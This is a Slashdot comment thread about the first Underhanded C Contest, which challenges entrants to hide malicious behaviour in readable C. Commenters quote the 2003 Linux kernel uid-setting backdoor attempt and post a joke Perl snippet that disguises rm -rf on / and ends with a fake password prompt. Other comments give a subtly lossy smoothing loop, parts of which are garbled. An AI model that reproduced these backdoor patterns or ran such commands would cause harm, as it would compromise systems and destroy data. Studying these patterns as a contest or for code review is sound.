The First Annual Underhanded C Contest 341
Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."
Re:What are the legal ramifications of this? (Score:3, Informative)
RTFA, please.
The challenge for the first UCC is to write a simple program that performs some basic image-processing operation, for example smoothing or resampling, but manages to conceal a unique imperceptible fingerprint in each image it opens.
The fingerprint should be different for every execution of the program. It doesn't have to have any particular meaning, but useful tracking information is worth extra points (tho getting caught is worth fewer points.) The print should be extractable from the output image by another program. Realistically, the detector will not have access to the original image for comparison purposes.
I seriously doubt that anyone could get arrested for writing something like this, dubious legal state or not.
Re: This year's challenge (Score:5, Informative)
Why, yes! http://sourceforge.net/projects/steghide/ [sourceforge.net]
Re:Indeed. This could be a field day for Java and (Score:3, Informative)
Re:Seems a bit like those hacking contests (Score:5, Informative)
I mean I could do something like this:
# When do you want it done?
$today="sudo";
$yesterday="su -c";
# Define our globals
$superman="ls";
$wonderwoman="rm"
$bat
$aquaman="mv";
#define some important flags
$blows="-r";
$maims="-p";
$chunks="-f";
#define some targets
$your_mom="/";
$your_dad="/usr";
$your
$your_teacher="/bin";
$hell="/dev/n
$heaven="/dev/random";
$skyhigh="nfs://mys
#....later, back at Superfriends Headquarters
`$batman $blows $your_sister $skyhigh`;
`$wonderwoman $blows $chunks $on $your_sister`;
`$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
#Would you like to see the rest of the story?
#print "Would you like to hear more? Please type your password to continue!";
The superfriends save the day again.
Re:Attack the Compiler (Score:2, Informative)
Re:Indeed. This could be a field day for Java and (Score:4, Informative)
Please check out the contest page: the "evil" behavior is not something java would prevent you from doing. We're not talking about crashing a computer or gaining root access, but performing a data processing task incorrectly. It's entirely problem state.
That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches. The winners of the obfuscated V contest used techniques like this to conceal their evil behavior, so I feel this would give people more freedom to get creative.
Finally, this is not meant to slam C, or open source, or any such like. I can't imagine how anyone can look at this contest and see it as an argument for less openness.
Xcott
Re:This will work (Score:1, Informative)
2. You don't mod people down over Godwin's Law. You declare the argument over, and the person who tried to use nazis or Hitler to vilify their opponent is the loser. There is not "-1, Godwin" mod category, nor should there be.
3. You only mod jokes up as "Funny" or "Insightful" if they are, in fact, funny or insightful. Saying Free Beer doesn't lead to greater liberties because Hitler once gave some people free beer fails to either debunk the original point (which can still be true in other cases), and also fails to make anybody laugh.
So no mod points should be used on his post, so people can save them to mod down both your post and mine as "Offtopic."
Re:Story is just plain bad (Score:3, Informative)
Have you seen Technocrat.net [technocrat.net]? Looks to be just starting, but I'm already impressed: slashdot ran an article on a nanotech textiles protest - technocrat ran one on a group of scientists demonstrating a refined iteration of a carbon nanotube CPU. Comments are on-topic too, touch wood.
(Or there's always ars [arstechnica.com] for CS stuff, but they're hardly a
Re:Why? (Score:4, Informative)
Is Google down? Okay, I updated the faq to tell you who we are.
Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerly hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.
Xcott
Re:Why? (Score:3, Informative)
Something like:
if (blah || blah || uid=0) {
blah;
}
Linux Kernel Backdoor Attempt (Score:5, Informative)
The attempt was trying to insert
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).
C is an awful language (Score:2, Informative)
Service Pack fixes it, but it's documented (Score:5, Informative)
Re:An example from years ago (Score:4, Informative)
Re:Subtlety (Score:3, Informative)
I've tried their Rare Vos, Hennepin, and self-named Ommegang beer: my favorite is the Rare Vos but I like them all.
Re:how's this? (Score:3, Informative)
What you really want is something more subtle. For example, here's an easy one using rounding errors in the core of a smoothing algorithm. Assumes a picture of width x height of type "RGB" (assumed to be a typedef'ed struct containing bytes r, g, and b) in a two-dimensional array called "picture" (and an equivalent one called "dest_picture").
for (int x=0; xwidth; x++)
{
const int next_x=(x+1==width ? 0 : x+1);
const int prev_x=(x-1==-1 ? width-1 : x-1);
for (int y=0; yheight; y++)
{
const int next_y=(y+1==height ? 0 : y+1);
const int prev_y=(y-1==-1 ? height-1 : y-1);
const RGB point1 = picture[prev_x][prev_y];
const char point1_r = point1.r / 9;
const char point1_g = point1.g / 9;
const char point1_b = point1.b / 9;
const RGB point2 = picture[x][prev_y];
const char point2_r = point2.r / 9;
const char point2_g = point2.g / 9;
const char point2_b = point2.b / 9;
const char dest_r = point1_r + point2_r + point3_r + point4_r + point5_r + point6_r + point7_r + point8_r + point9_r;
const char dest_g = point1_g + point2_g + point3_g + point4_g + point5_g + point6_g + point7_g + point8_g + point9_g;
const char dest_b = point1_b + point2_b + point3_b + point4_b + point5_b + point6_b + point7_b + point8_b + point9_b;
next_picture[x][y].r=dest_r;
next_picture[x][y].g=dest_g;
next_picture[x][y].b=dest_b;
}
}
In case you didn't catch what it does, by dividing by nine before accumulating instead of afterwards, we're losing more color resolution. You'll never see values 253, 254, or 255, for example, in r, g, or b. There will also be a sawtooth pattern in what were initially smooth gradients on a per-channel basis (less noticable when the image is viewed as a whole). It's not perfect, but it is a start. The possibilities really increase when doing things that add noise to an image; skewing a randomization function is trivially easy.
If you want to be really devious, though, you need to mess with program internals. Overflow a string to mess with your function's frame return parameter, for example. You could also do things like deliberately cause signals to be thrown that you catch. There's a lot of possibilities.
Vectors (Score:3, Informative)
A way to automatically find this would be to use an execution tracer that would alert you when the programs point of execution "left" it's source code or allowed system api's.
Re:I'll take the bait (Score:3, Informative)
You are correct. This is from ISO/IEC 9899:1999(E):
(emphasis added)Re:You're just not used to it. (Score:1, Informative)
Are you aware that the Linux kernel contains not just one, but two fully-functional tracing garbage collectors? There's one in JFS2 and another in the routing table/xform code.
Funny how people always get hung up about GC, when really it's all around them and they never even knew, because it the flaws they thought it had don't exist .